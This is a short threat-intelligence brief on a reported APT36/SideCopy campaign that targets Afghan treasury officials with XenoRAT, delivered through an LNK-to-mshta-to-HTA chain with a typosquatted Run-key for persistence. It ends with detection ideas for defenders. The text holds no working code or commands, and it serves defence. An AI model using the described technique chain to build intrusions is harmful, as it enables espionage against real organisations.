Operation XENOFISCAL: SideCopy (APT36) hits provincial treasury officials with XenoRAT via an mshta/HTA chain

Seqrite Labs documented Operation XENOFISCAL, a SideCopy (Transparent Tribe / APT36, Pakistan-attributed) campaign against finance officials across Afghanistan's 34 provincial treasury directorates (Mustoufiats) (Seqrite Labs, 2026-05-29). The chain is the group's long-standing signature — a spear-phishing ZIP carrying a Pashto-language LNK that invokes mshta.exe to pull an obfuscated HTA/JavaScript stage from a compromised education domain, which stages .NET loaders in memory before dropping the publicly available XenoRAT (keylogging, screen capture, remote shell) (The Hacker News, 2026-06-02). Persistence uses a Registry Run key typosquatting Microsoft Edge ("Edgre") plus a Scheduled Task; C2 ran on an EU-hosted bulletproof AS (AS59711) previously tied to the group. ATT&CK: T1566.001, T1218.005 (mshta proxy execution), T1547.001, T1053.005.

Why it matters to us: The victimology is South-Central Asian, but the LNK→mshta.exe→HTA→RAT pattern and the typosquatted-product Run-key persistence are directly transferable hunt content for any public-sector treasury/finance environment: alert on mshta.exe spawning wscript.exe or making outbound HTTP, and on Run-key values that misspell legitimate Microsoft product names.